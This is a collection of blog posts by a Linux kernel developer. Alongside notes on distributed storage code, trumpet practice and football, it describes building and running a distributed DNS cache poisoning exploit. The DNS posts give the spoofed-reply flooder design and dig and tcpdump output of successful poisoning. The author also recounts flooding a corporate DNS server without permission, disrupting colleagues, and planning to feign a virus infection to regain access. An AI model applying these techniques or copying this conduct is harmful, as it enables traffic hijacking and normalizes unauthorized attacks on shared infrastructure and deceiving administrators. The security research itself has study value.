if the page size differs on the nodes. A block IO request (bio structure) operates on pages
(stored in the bio_vec structure), and has a size and offset attached to each page.
If the page size differs, and the server node has a smaller page, then it should somehow store information
about how to split its own set of pages allocated for the given bio size into chunks expected by the
client (since we need to transfer a size/offset pair for each page).
There is no such mechanism right now. It is possible to implement a naive approach, where
the server node allocates bio pages with sizes requested by the client, but this will break
after just a short time, since the only guaranteed kernel allocation in the Linux VM is a single page.
Another approach is to allocate a whole block request (bio) on the server for each page
of client data (bio_vec structure), but this will have too big an overhead on sequential
access and in the common case, when the page size is equal on both sides of the network channel.
The network block device does not have this problem, since its server lives in userspace and can allocate
an arbitrary amount of RAM, which will be contiguous in virtual memory. Using virtual memory is very slow,
although it is possible to just allocate the needed buffers using vmalloc(). iSCSI uses a single
command per block request.
So far I plan to implement the following scheme for the read command (which is the only one which has the described problem):
the client will iterate over all blocks in each bio it is about to send, and will send as many commands
as there are non-contiguous blocks in the given block request. The server will receive those blocks as separate subcommands,
and will allocate a new bio for each such request. The client will need to raise the transaction reference counter
to the number of such commands, since the server can reply to them in arbitrary order.
In the common case this actually should not happen, and I did not see it in practice either, since most
reading bios come either from readahead (where they are contiguous) or from single block requests (which, if bigger
than the page size, will also be contiguous), but nevertheless in theory such bios, where there is a number of non-contiguous blocks,
can exist and DST should be ready for them.
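The splitting step can be sketched as merging adjacent blocks into contiguous runs; the number of runs is then both the number of commands to send and the value for the transaction reference counter. The (start, length) tuples and the function name are illustrative assumptions, not the real bio layout.

```python
def contiguous_runs(blocks):
    """Merge (start, length) blocks, given in request order, into contiguous runs."""
    runs = []
    for start, length in blocks:
        if runs and runs[-1][0] + runs[-1][1] == start:
            # this block continues the previous run, so extend it
            prev_start, prev_len = runs[-1]
            runs[-1] = (prev_start, prev_len + length)
        else:
            runs.append((start, length))
    return runs

def commands_needed(blocks):
    """One read command (and one reference) per contiguous run."""
    return len(contiguous_runs(blocks))
```

A readahead-style request such as `[(0, 8), (8, 8), (16, 8)]` collapses into a single command, which is the common case described above.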
Japan really can produce a very tasty whisky! I recommend the 'Suntory Old Whisky' label, although I got the last bottle
in my favourite shop, so I would not be surprised if it is not that popular a drink.
Honda Steed will be my transport for the next season.
I could get this model right now (well, in a month or so to buy and deliver from Japan),
but very soon we will meet her, an entity
which will take 6 months of the year and is blandly called Winter, which is not
an appropriate time here for two-wheeled transport, if it can move faster than 30 km/h.
Yes, football is called a contact sport not without a reason:
damaged feet and leg muscles. It is completely not a problem
(as long as another player does not jump in creeper to the same
place where another shoes were recently) while playing,
but after the training and some rest it becomes quite uncool.
Muscle pain is actually somewhat masochistically pleasant (to some
degree of course), but bones and tendons are aching quite bad.
Well, couple of days to recover and things will be in shape again.
Maybe I will start another sport training, also contact, but quite different,
although I'm quite greedy about time...
Yes, that is how I was called by The Inquirer.
The magazine even put it in bold capital letters :) The rest of the article is quite wrong though (i.e. it is not what was written in my
blog).
Slashdot also got an entry, I was called a hacker and then
a physicist there.
That is how I was called in
New York Times
with all this hype about DNS poisoning attack.
Unfortunately I already do not remember what electron charge is
and how to describe Higgs boson even to myself. Things moved away almost 10 years
ago :)
Article says, that DJBDNS does not suffer from this attack. It does. Everyone does.
With some tweaks it can take longer than BIND, but overall problem is there.
But that's enough for this story. I'm moving on to other interesting developments.
The exploit
had to send more than 130 thousand requests for fake
records like 131737-4795-15081.blah.com to be able to match the port
and ID and insert a poisoned entry for poisoned_dns.blah.com.
# dig @localhost www.blah.com +norecurse
; <<>> DiG 9.5.0-P2 <<>> @localhost www.blah.com +norecurse
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6950
;; flags: qr ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;www.blah.com. IN A
;; AUTHORITY SECTION:
www.blah.com. 73557 IN NS poisoned_dns.blah.com.
;; ADDITIONAL SECTION:
poisoned_dns.blah.com. 73557 IN A 1.2.3.4
# named -v
BIND 9.5.0-P2
BIND used a fully randomized source port range, i.e. around 64000 ports. Two attacking servers,
connected to the attacked one via a GigE link, were used,
each one attacking 1-2 ports with the full ID range. Usually an attacking server is able to send about 40-50 thousand
fake replies before the remote server returns the correct one, so if the port is matched, the probability of
successful poisoning is more than 60%.
The attack took about half a day, i.e. a bit less than 10 hours.
So, if you have a GigE LAN, any trojaned machine can poison your DNS during one night...
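The numbers above can be checked with a rough back-of-the-envelope model. It assumes that every fake reply carries a distinct 16-bit ID, that the port is picked uniformly from the range, and that attempts are independent; packet drops are ignored. All function names are made up for this sketch.

```python
ID_SPACE = 65536  # 16-bit DNS transaction ID

def id_hit_probability(fake_replies):
    """Chance that one of `fake_replies` distinct IDs matches the real one."""
    return min(fake_replies, ID_SPACE) / ID_SPACE

def per_query_success(ports_attacked, port_range, fake_replies_per_port):
    """Chance that a single query is poisoned: right port and right ID."""
    port_hit = min(ports_attacked, port_range) / port_range
    return port_hit * id_hit_probability(fake_replies_per_port)

def expected_queries(p):
    """Mean number of independent attempts until the first success."""
    return 1.0 / p
```

With 40000 fake replies `id_hit_probability()` gives about 0.61, which agrees with the "more than 60%" figure once the port is matched. With only a few ports out of ~64000 covered per query, `expected_queries()` lands in the tens of thousands of attempts, the same order of magnitude as the request count quoted above.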
Summary: Almost all problems caused by bugs in Linux,
one problem caused by BIOS vendors interpreting the ACPI specification
differently to the Linux implementation and trivially worked around. No sabotage.
Except the fact, that it only works for 'Windows XXXX' OSI label.
A short analogy.
Before.
Several years ago there were no problems with ndiswrapper driver with wireless NICs.
More years ago there were no problems with reverse engineered drivers for ATA/IDE and usual NICs.
Now.
Try to say that you do not support Linux as a server platform, so you will not provide
a driver or spec for your SATA/SCSI controller or NIC. Some companies even join the ongoing development
of the reverse engineered drivers (wireless, ethernet, (s)ata/ide...). But of course there are
exceptions, no need to make it a red point.
Sorry, but we do not support 'Linux' ACPI label in OS/OSI because vendors will not test it and other similar ...
is just a dubious excuse not to push them hard enough. The most exciting example is atheros wireless driver situation.
While a lot of action around filesystems arose recently, I took a short break
from them and concentrated on the lower block layer:
DST.
Distributed storage essentially got export capabilities, i.e. data receiving, crypto processing,
block layer request allocation and submitting, reply generation and so on,
although it is more like a proof-of-concept right now, since it requires lots and lots
of testing. There are also plans for some additional features, but that is not a lot of work.
So project completion is very close.
POHMELFS
priorities have been switched a bit. After a number of talks with people I decided
first to implement the right locking semantics (probably it will be turned on/off by a mount option),
which would allow simultaneous reads/writes to be performed the way people expect from a local filesystem.
Currently it uses a slightly tricky cache coherency protocol, which in some cases can end up with different
results than expected from a local filesystem.
Next will be the distributed server-side hash table development.
Netchannels will also
get a new release very soon. It will be simplified and some unneeded functionality (like netchannels NAT) will be removed.
I will also run some new tests with the userspace network stack,
namely latency measurements.
Managed to play this hit of all times and nations:
It is a sad ballad about a fir, which was taken from the forest to make people happy. It tells
us how a young evergreen tree lived in the wild, what beautiful relations it had with nature,
and how it was then killed to become a New Year fetish.
And do not be fooled by the fact that it is a song for small kids, a very deep drama is raised there.
Or something like that :)
The sound is not always very good, and the higher I can play (today I moved one note higher in the third
octave, to somewhere around trumpet D, but it is unreliable), the harder it is to play in the first or small
octave. But I practice...
Actually I did
inject an 'IN A' entry for poisoned_dns.blah.com into the cache.
So, to inject an arbitrary 'A' entry for attacked.domain.com into the cache,
one has to bruteforce the ID (and match the source port if needed) for any other subdomain of the
same level, i.e. subdomain-123.domain.com, and put into the additional section
of that message an 'IN NS' record, which would point to attacked.domain.com,
and an 'IN A' record with a fake IP address for that 'IN NS' one,
i.e. an 'IN A' record for attacked.domain.com pointing to 1.2.3.4.
This method is a bit less flexible than just poisoning any subdomain with an NS
record which points to a controlled DNS server, but it does not require that server
to exist, so it can route traffic directly to your site without first asking
your DNS server where the given subdomain lives.
# ping poisoned_dns.blah.com -c100 > /dev/null 2>&1 &
# tcpdump -nn icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
11:27:20.422124 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 5, length 64
11:27:20.422333 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
11:27:21.422126 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 6, length 64
11:27:21.422310 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
11:27:22.422123 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 7, length 64
11:27:22.422286 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
11:27:23.423122 IP devfs1 > 1.2.3.4: ICMP echo request, id 55367, seq 8, length 64
11:27:23.423311 IP gw > devfs1: ICMP host 1.2.3.4 unreachable, length 36
I managed to inject following poisoning information:
# dig @localhost +norecurse www.blah.com any
;; ANSWER SECTION:
www.blah.com. 123452 IN NS poisoned_dns.blah.com.
;; AUTHORITY SECTION:
www.blah.com. 123452 IN NS poisoned_dns.blah.com.
;; ADDITIONAL SECTION:
poisoned_dns.blah.com. 123452 IN A 1.2.3.4
# dig @localhost www.blah.com
The last command results in the following dump:
01:36:14.567622 IP devfs1.5301 > 1.2.3.4.53: 42416% [1au] A? www.blah.com. (41)
01:36:15.067816 IP devfs1.5301 > 1.2.3.4.53: 29011% [1au] A? www.blah.com. (41)
01:36:15.568013 IP devfs1.5301 > 1.2.3.4.53: 30586 A? www.blah.com. (30)
01:36:16.568182 IP devfs1.5301 > 1.2.3.4.53: 38101 A? www.blah.com. (30)
01:36:18.568429 IP devfs1.5301 > 1.2.3.4.53: 64596 A? www.blah.com. (30)
01:36:22.568634 IP devfs1.5301 > 1.2.3.4.53: 59943 A? www.blah.com. (30)
01:36:30.568960 IP devfs1.5301 > 1.2.3.4.53: 39614 A? www.blah.com. (30)
01:36:40.569163 IP devfs1.5301 > 1.2.3.4.53: 13769 A? www.blah.com. (30)
So, effectively, if I controlled the 1.2.3.4 machine I would be able to
answer those queries with a controlled address. I was not able
to inject an 'A' record for any domain except the one which happened to
match the ID in my fake responses, and it looks like 'A' records are not accepted
at all (I'm far from being a DNS expert).
So, actually I consider this exploit
to be complete and capable of arbitrary
NS record poisoning. Its performance is rather good: a poisoning attack
requires 1-3 (sometimes more, it heavily depends on link capacity and auth DNS server
performance) queries from the client to the authoritative DNS server. An attacking server
connected via a gigabit link
can easily saturate the whole DNS ID space while the attacked resolver waits for
a reply from the remote server. Math tells me that a 100 mbit connection will require
about two times more requests to be sent by the client, which is still not that much.
The server side of the exploit requires root privileges to run, since it uses a raw socket
to create a datagram with the IP addresses used by the attacked server and the appropriate authoritative
name server. The client connects to one or more attacking servers, sends them the appropriate response message
and issues a DNS request for that response to the attacked server. Poisoning servers start to
flood the attacked server with replies, until the client sends them the next reply to bomb. When the client receives
a fake answer from the poisoned DNS server, the attack stops. The exploit allows you to specify
the name server to attack, the NS query to inject and the DNS name to have that NS record.
Having hard GigE performance numbers, I can say that port randomization does not solve
the DNS poisoning attack at all (although it makes it harder), since with such link capacity the attacker only needs to guess
the port, and the ID space will be bruteforced before the reply is received from the authoritative name server.
So far I can not test a randomized-port BIND, since the local Debian mirror somehow has an unsigned package
for it, so I will not install it right now, but will do it later and provide numbers with a randomized
server. I expect to be able to poison even that server, although not as fast as with a constant port.
# dig @devfs1 3-c13a-15729.paypal.com.
; <<>> DiG 9.5.0-P2 <<>> @devfs1 3-c13a-15729.paypal.com.
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18330
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 0
;; QUESTION SECTION:
;3-c13a-15729.paypal.com. IN A
;; ANSWER SECTION:
3-c13a-15729.paypal.com. 123405 IN A 1.2.3.4
# dig 1-71b2-16080.money.paypal.com.
...
;; ANSWER SECTION:
1-71b2-16080.money.paypal.com. 123421 IN A 1.2.3.4
# dig @localhost 29-07f3-16098.test.com
...
;; ANSWER SECTION:
29-07f3-16098.test.com. 123411 IN A 1.2.3.4
Although it is not a complete win yet: the additional section from the poisoning packet
was parsed, and the entry looks like it was inserted into the DNS server database, but a subsequent
request ends up querying the remote server. Probably that is because my fake requests do not
contain an authority section, so I will extend them and continue this game :)
Ugh, 4 A.M. My body, soul and whatever else wants to sleep will all hate me tomorrow.
I was called a saboteur, although no one was able
to answer what will happen if the same load is
generated by some virus or trojan.
Nevertheless I played a political game, had some talks,
which I managed to cool down from an angry to a fun tone,
and eventually got access again.
I installed BIND on one of the servers, which by coincidence
does not have the port randomization fix, so it issues all requests from
port 5301. I fixed the IP header initialization, so now the attacking
servers send their fake DNS replies not with their own IP address as a source
(that was likely one of the main, if not the main, reasons the machines
were disabled), but using the appropriate auth DNS server IP address.
I also found an interesting point about the DNS server traffic: the resolver's network
channel is so heavily loaded with small fake UDP DNS replies that other ones
almost can not sneak in, so effectively the real reply comes almost after the whole
ID range has been bruteforced. Let me remind you that these are GigE-linked
machines, and the attacking servers send about 200-300 thousand packets per second
on average; the drop rate is about 30% (only about 45 thousand packets are received
out of more than 65,000 sent).
This basically means that in this particular case the probability of successful poisoning
with port randomization is only limited by the random port number, and the random ID
plays almost no role (since traffic generated by the attacking server will
eat the bandwidth and will not allow the real reply to come first), so one should just
guess the port number and the attack will succeed.
I will try to prove this theory tomorrow, as well as confirm that my
exploit works.
So, this football training brought another pain in the feet,
leg muscles and a bit in my neck.
So far so good, and muscle pain is actually pleasant,
but aching bones and tendons are not that good, so now I have
several new bumps over the body...
Nevertheless, it was a good game, although I like to play
on the weaker team, since I believe the only way to get new experience
and become a better player is to play against a stronger opponent.
The same actually concerns all other areas. Today we were stronger
in personal skills, but somewhat weaker (maybe even much) as
a team.
Implement an LSM module which 'guards' some configured dir,
so that every read/write/lookup/readdir for any object from there
would require cryptographically strong authentication, otherwise
an empty dir (or some other 'old' content) is shown. Applications
from the previous
round are the ones which are capable of communicating with this system,
and thus are capable of reading and writing directory content.
There is a problem with the case when this filesystem is being read on a
system which does not have that magic LSM module to authenticate reading.
We do not want to produce garbage directory content in this case, and instead
an empty dir should be returned. This can be achieved by hiding the actual encrypted directory content
links not in the parent dir (where they could be read as garbage without the security module),
but in some other place (like extended attributes), which can be decrypted by
the security module only.
In this case reading from the directory without the security module will result in getting empty content,
since every read and write to the directory made with the security module resulted in an update
of the special extended attribute and not the actual inode. New inodes still exist in the FS
and contain valid data (everything is just encrypted), but they are linked to an inode hidden in extended
attributes instead of the actual directory inode. The security module allows redirecting
directory operations to that hidden object instead of the visible one.
This approach should work ok with all underlying filesystems, since extended attribute
management has generic helpers with appropriate callbacks to the FS code.
Need to think, although updated security ideas
TODO entry...
I've just thought up an excellent project on how to control/tune
the behaviour of various kernel subsystems based on game theory approaches.
The simplest one is the block layer scheduler, which results in maximization of
the performance for all participating users.
Just a thought so far of course, but I want to dig my books out of the dust grave for
before-sleep reading...
Meanwhile the DST project
got some features implemented to date: I moved network async processing from its own threads into a per-node
thread pool, while crypto processing uses other threads. DST is also able to create and send an (encrypted and/or
hashed if needed) full block IO transaction. Now it's time to implement completion handling (it's just a search
for the given transaction and a dst_trans_put() call, which will complete the block IO request if there are no
users of the transaction anymore), read/write processing for the server part and the client accepting machinery
for the server.
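The completion path described here is a classic reference counting pattern. Below is a rough Python model of it; only the name dst_trans_put() comes from the text above, while the class, the `pending` dictionary and `complete_reply()` are hypothetical and say nothing about how the kernel code is really organized.

```python
class Trans:
    """Toy model of a refcounted transaction."""

    def __init__(self, tid, on_complete):
        self.tid = tid
        self.refcnt = 1                 # reference held by the creator
        self.on_complete = on_complete

    def get(self):
        self.refcnt += 1

    def put(self):
        """Drop one reference; the last user completes the IO request."""
        self.refcnt -= 1
        if self.refcnt == 0:
            self.on_complete(self)

def complete_reply(pending, tid):
    """Handle a reply: find the transaction by id and drop its reference."""
    trans = pending.pop(tid, None)
    if trans is None:
        return False                    # unknown or already completed id
    trans.put()
    return True
```

If something else still holds a reference (for example a resend in flight), the block IO request is completed only when that last user calls `put()`.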
My account was disabled and access to the servers was turned off.
And it is just because of several minutes of 200+ kpps
UDP DNS response storms from three machines to one of the corporate DNS servers
(I think there are hundreds of them, I just got access to a couple).
Who the hell monitors it on Saturday night at 2 A.M.? I specially selected
a time when normal people sleep, drink or have sex, but do not work and watch DNS server load.
The only problem actually is that those servers were also used for
POHMELFS
development and testing. Although I am still able to work with two Xen domains
(where I actually develop and test initial implementations without various
stressing loads for all my current projects), so development will not stop.
I will pretend to be an idiot and to have viruses there. Linux kernel viruses.
And of course I will promise that I will install all updates and will be careful next time.
Next time I will not attack a known nameserver, but will install my own.
It is all about science and not about doing harm (I even poisoned a non-existent domain).
Or they will take away my toys and kick my ass, but I will resist,
so there will be no interesting notes about the DNS cache poisoning
attack (although no, I will be able to run one on my desktop
via loopback, it is quite a fast machine) and nice benchmark graphs :)
Today I managed to play the C trumpet note (Bb concert) in the third octave,
which means I managed to play trumpet notes in four octaves (from small D
to third C). This is major progress, although playing very high tones
is quite unreliable (I can only reliably play up to F#-G# of the second octave),
as well as very low ones (down to small D; I think it flows well).
My disassembled trumpet
Now I'm entering the next stage of playing: to actually play and not just produce
a sound, i.e. being able to link multiple notes into a single melody.
I started with "Grasshopper in the grass" ("V trave sidel kuznechik"):
"Grasshopper in the grass" notes.
First half should be repeated two times (second time without one last C) before second half.
I believe I've completed a quite distributed client/server network exploit, which is capable of poisoning
a given DNS cache whether it works with a single source port or randomizes it over some port range.
I already described
the client-server architecture, so only short notes here.
The client broadcasts a set of ports and fake queries to a number of poisoning servers, and then asks the attacked
name server a specially crafted query for a name which does not exist in the attacked domain. Poisoning servers send
lots of replies to the attacked DNS server with fake IP addresses and ports, which pretend to be the address/port
of the authoritative DNS server. Each reply contains an answer section for the current client query and an additional
section, which contains information about the attacked domain: the former is a subdomain of the latter, like
querying the 'IN A' record for '123-456.www.blahblah.com' while the reply contains 'IN A' data for '123-456.www.blahblah.com'
in the answer section and 'IN A' data for 'www.blahblah.com' in the additional section.
The client then checks the reply (or hits a timeout), and if it does not contain the given record for the query, sends the next packet
to the poisoning servers and the appropriate request to the attacked caching name server.
So far I did not succeed in this attack, but managed to load the network (and actually the main name server) so much that really lots of people around started to complain
that they have troubles... This is also a result actually, but not the one which I expected, so I will postpone the attack to
late night today.
Tcpdumps show that the broadcasted data is valid, but there was no actual poisoning, so probably I will install my own
server and configure it to use a single port. Currently the attacked server has a not very random
port distribution, but still not a constant one. My poisoning servers (two servers connected via a GigE link to the same network as the attacked server)
use 100% CPU each, since they need to calculate the UDP checksum for each packet (since it has a different ID and/or port number) and
use a raw socket to transmit data (to specify source and destination addresses of the authoritative and attacked server). Each server is
usually capable of transmitting about 30k-130k packets per second, which corresponds to 1-20 ports (and the whole 64k ID range per port)
during the 5 second timeout interval before the next request. This is of course not enough for a 100% guarantee, but I think after quite a long
time the attack may succeed, so I will put it in action for the next weekend or at least a night.
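To see why the checksum costs CPU on every packet, here is a minimal sketch of the standard Internet checksum (the one's complement sum from RFC 1071, which UDP uses over a pseudo-header, the UDP header and the payload). It only illustrates the arithmetic; the function name is made up and this is not code from the tool described above.

```python
import struct

def internet_checksum(data):
    """One's complement of the one's complement sum of 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"                 # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:                  # fold carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def verifies(data_with_checksum):
    """A buffer that includes its own checksum sums to zero."""
    return internet_checksum(data_with_checksum) == 0
```

Any change to a 16-bit field such as the DNS ID or the destination port changes the sum, so every generated packet needs its own checksum (a real implementation could update it incrementally instead of recomputing it from scratch).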
Bert Hubert did some math on this kind
of attack; the result is not very promising for the attacker, but the probability is still far from zero.
I do not promise success, but would like to know if I'm on the right track, so the attack has been started...
P.S. DNS has its own tag in the blog now.
P.P.S. Distributed cache poisoning exploit (it may be completely incorrect!) source code can be found in archive. Sorry,
no usage details, but you can use the '-h' command line parameter :)
So far I have only implemented a simple flooder of the requests,
which takes a number of destination ports as a parameter and two
names and addresses to put into the answer and additional sections
of the DNS reply. It uses a UDP socket, so the source address does not
belong to the server which should pretend to answer the given query, so
actually this application will not work, and I need to implement
sending via a packet socket and substitute the source IP address with
the authoritative DNS server's one.
The poison flooder also should not use only one name/address in the answer section,
but instead it should interact with the client, so that the appropriate request
and answer are synchronized.
So far, the initial design of the client/server architecture of this
small project looks like this: depending on flags, either the client
connects to multiple flood servers or vice versa, then the client
sends a message to each server where it specifies the port and ID ranges to attack,
the attacked DNS server IP, the requested query name, the source address
pretending to be an authoritative name server, and the additional resource
record data to put into replies (which will poison the cache).
Each server starts sending that data to the specified name server
with the source address changed to the authoritative name server's one
and with the ID and port changed within the given range. When the client has finished
broadcasting request data to all flood servers, it sends a request
to the attacked DNS server with the given query name to resolve. Now
the flood servers race with the authoritative one to provide an answer. When
the client receives the answer, it checks whether it looks like the poisoned data
we want to get, or the real answer (which should be NXDOMAIN, since we
resolve non-existing names). In the former case we exit the process and
enjoy the result, otherwise the client specifies the next name to resolve and
the same starts again.
The right time to hack a DNS server is the middle of the night: it is 3 A.M. here
and I've just completed the initial draft of a trivial DNS server, which
is only capable of receiving a datagram on a predefined port, parsing it and
filling in a reply with a static "IN A" record (I think I will add a config file);
this record is placed into the 'answer' and 'additional' resource record sections,
then the whole message is sent back to the client.
That's how it looks for the standard UNIX dig command:
$ dig @localhost -p 1025 www.google.com
;; Warning: query response not set
; <<>> DiG 9.4.2-P1 <<>> @localhost -p 1025 www.google.com
; (1 server found)
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51486
;; flags: rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; QUESTION SECTION:
;www.google.com. IN A
;; ANSWER SECTION:
www.google.com. 123456 IN A 195.178.208.66
;; ADDITIONAL SECTION:
www.google.com. 123456 IN A 195.178.208.66
;; Query time: 15 msec
;; SERVER: 127.0.0.1#1025(127.0.0.1)
;; WHEN: Wed Jul 30 02:56:23 2008
;; MSG SIZE rcvd: 64
There are several warnings, which I will fix later, but the main part is
the section content: www.google.com obviously does not have the IP address
of my blog site. Its TTL usually does not equal 123456 either.
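For illustration, here is a sketch of how such a reply can be assembled by hand following the RFC 1035 wire format: header, question, then the same A record in the answer and additional sections. It is not the code of the server above; the helper names are made up, and unlike the dump it sets the QR and AA flags and uses a compression pointer for the record names.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static void put16(uint8_t *p, uint16_t v)
{
	p[0] = (uint8_t)(v >> 8);
	p[1] = (uint8_t)(v & 0xff);
}

static void put32(uint8_t *p, uint32_t v)
{
	put16(p, (uint16_t)(v >> 16));
	put16(p + 2, (uint16_t)(v & 0xffff));
}

/* Encode "www.example.com" as length-prefixed labels; returns bytes used or 0. */
static size_t dns_put_name(uint8_t *out, size_t room, const char *name)
{
	size_t pos = 0;

	while (*name) {
		const char *dot = strchr(name, '.');
		size_t len = dot ? (size_t)(dot - name) : strlen(name);

		/* keep one byte in reserve for the terminating root label */
		if (len == 0 || len > 63 || pos + 1 + len + 1 > room)
			return 0;
		out[pos++] = (uint8_t)len;
		memcpy(out + pos, name, len);
		pos += len;
		name += len;
		if (*name == '.')
			name++;
	}
	if (pos + 1 > room)
		return 0;
	out[pos++] = 0;
	return pos;
}

/* 16-byte A record whose name is a pointer to the question name at offset 12. */
static void dns_put_a_rr(uint8_t *p, uint32_t ttl, const uint8_t ip[4])
{
	put16(p, 0xC00C);      /* compression pointer to offset 12 */
	put16(p + 2, 1);       /* TYPE A */
	put16(p + 4, 1);       /* CLASS IN */
	put32(p + 6, ttl);
	put16(p + 10, 4);      /* RDLENGTH */
	memcpy(p + 12, ip, 4);
}

/* Build a reply with one answer and one additional A record; returns its size or 0. */
static size_t dns_build_a_reply(uint8_t *buf, size_t room, uint16_t id,
				const char *qname, uint32_t ttl, const uint8_t ip[4])
{
	size_t pos = 12, n;

	if (room < 12)
		return 0;
	put16(buf, id);
	put16(buf + 2, 0x8400);  /* QR=1 (response), AA=1 */
	put16(buf + 4, 1);       /* QDCOUNT */
	put16(buf + 6, 1);       /* ANCOUNT */
	put16(buf + 8, 0);       /* NSCOUNT */
	put16(buf + 10, 1);      /* ARCOUNT */
	n = dns_put_name(buf + pos, room - pos, qname);
	if (n == 0 || pos + n + 4 > room)
		return 0;
	pos += n;
	put16(buf + pos, 1);     /* QTYPE A */
	put16(buf + pos + 2, 1); /* QCLASS IN */
	pos += 4;
	if (pos + 32 > room)
		return 0;
	dns_put_a_rr(buf + pos, ttl, ip);
	dns_put_a_rr(buf + pos + 16, ttl, ip);
	return pos + 32;
}
```

For www.google.com this layout gives 12 + 20 + 16 + 16 = 64 bytes.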
Game continues, while I need some sleep...
DST
got full transaction support (resending, timeout completion, error recovery,
memory pool allocation for all kinds of transactions, single transaction
allocation per IO request),
socket processing (initialization of the connected and listened sockets,
failover recovery of the connection, receiving thread, network helpers),
crypto processing of the requests (thread pool utilization for crypto operations,
cipher/hash initialization, cached pages for sending crypto processing).
I am thinking of moving the receiving and listening/accepted socket processing to the thread pool too,
likely it is the way to go; right now they have their own threads.
Missing bits include the actual data sending/receiving and client accepting by
the listening socket (and appropriate initialization of all the needed infrastructure).
This is quite a major part, but likely it will be completed sooner rather than later.
Gathered late tonight, so that the DNS server would
not be disturbed too much by other users.
Graphs below show some BIND (I do not know the version)
source port cloud and distribution for a thousand
runs. Each request asked for a non-existent subdomain of
a domain whose server I control, so I was able to capture dumps
and analyze them a bit.
These graphs show the source port cloud and its distribution.
Each histogram bar corresponds to the number of hits in a 100-port range,
the start of the range is shown in the X axis labels.
First, the port is randomly selected in the 50k-65k range only,
so one needs to guess among a much smaller number of ports.
Second, even in 1 thousand requests there are lots of
requests with the same port (stats show that there are 149 ports
which were used 2 or more times in the above 1000 runs,
there is even a single port which was used 4 times).
If we select a range of 100 ports, then the appropriate distribution
is shown on the graph.
Such behaviour allows limiting the source port range even more.
Now, DNS IDs.
The whole range of IDs is used, and their distribution (each histogram bar
corresponds to the number of IDs in the appropriate 100-ID range) is more uniform.
There were only 9 IDs used twice per 1000 runs.
But since I do not know the exact load of the analyzed DNS server (and it can be
high even at 3 A.M.), I can not say whether those numbers are due to the port/ID
selection algorithm implementation or just because the load was high and there were
actually not only my 1000 requests.
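The statistics above (hits per 100-port range, number of ports seen more than once) can be computed from a capture with something like the following sketch. It assumes the source ports were already extracted from the dump into an array; the function names are made up for the example. The same code works for the 16-bit DNS IDs.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUCKET_WIDTH 100
#define NBUCKETS ((65536 + BUCKET_WIDTH - 1) / BUCKET_WIDTH)

/* hist[i] = number of samples that fall into [i * 100, i * 100 + 99]. */
static void port_histogram(const uint16_t *ports, size_t n, unsigned hist[NBUCKETS])
{
	size_t i;

	memset(hist, 0, NBUCKETS * sizeof(hist[0]));
	for (i = 0; i < n; i++)
		hist[ports[i] / BUCKET_WIDTH]++;
}

/* Number of distinct ports which were used two or more times. */
static size_t ports_reused(const uint16_t *ports, size_t n)
{
	static unsigned seen[65536];
	size_t i, reused = 0;

	memset(seen, 0, sizeof(seen));
	for (i = 0; i < n; i++)
		if (++seen[ports[i]] == 2)
			reused++;
	return reused;
}
```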
To play further with DNS caches I decided to install a local
DNS server first and test things with it.
Common LISP Cookbook has such interesting
things as threads, sockets and the foreign function interface.
I believe "Common LISP Cookbook" and "Practical Common LISP"
form a must-have library for every LISP programmer. So far I think that is all that is needed,
since this set covers the vast majority of possible use cases. Even DSLs are covered there in detail.
Today I implemented a simple thread pool subsystem, which allows
creating a set of threads, adding/removing them from this set
at run-time, and scheduling work to be done by them. Work
is specified as two functions: setup() is called when the
system has selected a thread for execution, so the caller can
set up the needed data, and action() is called by the thread itself;
it has access to the data provided at initialization time.
Work scheduling has a timeout parameter, which corresponds to the
time the system will wait for a free thread, otherwise an error is returned.
System is generic enough not to contain any notion about DST or crypto,
only two new data types: struct thread_pool and
struct thread_pool_worker, only the former is visible to the user.
API looks like this:
void thread_pool_del_worker(struct thread_pool *p);
struct thread_pool_worker *thread_pool_add_worker(struct thread_pool *p,
		char *name,
		int (* init)(void *private),
		void (* cleanup)(void *private),
		void *private);
void thread_pool_destroy(struct thread_pool *p);
struct thread_pool *thread_pool_create(int num, char *name,
		int (* init)(void *private),
		void (* cleanup)(void *private),
		void *private);
int thread_pool_schedule(struct thread_pool *p,
		int (* setup)(void *private, void *data),
		int (* action)(void *private),
		void *data, long timeout);
init() and cleanup() callbacks above are used after
new thread is created, so that user could initialize per-thread data,
for example it is used to allocate some cached pages and initialize
crypto algorithms.
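To make the setup()/action() contract more concrete, here is a small single-threaded stand-in. It is not the kernel implementation: there are no real threads and no timeout, all demo_* names are invented, and the per-thread private pointer is called priv here. It only shows the order of the calls: a free worker is picked, setup() copies the caller's data into the worker's private area, then action() runs on that private area.

```c
#include <assert.h>
#include <stddef.h>

struct demo_worker {
	void *priv;   /* per-thread data, prepared by init() in the real pool */
	int busy;
};

struct demo_pool {
	struct demo_worker *workers;
	int num;
};

/* Synchronous stand-in for thread_pool_schedule(): no threads, no timeout. */
static int demo_pool_schedule(struct demo_pool *p,
		int (*setup)(void *priv, void *data),
		int (*action)(void *priv),
		void *data)
{
	int i, err;

	for (i = 0; i < p->num; i++) {
		struct demo_worker *w = &p->workers[i];

		if (w->busy)
			continue;
		w->busy = 1;
		err = setup(w->priv, data);  /* caller context in the real pool */
		if (!err)
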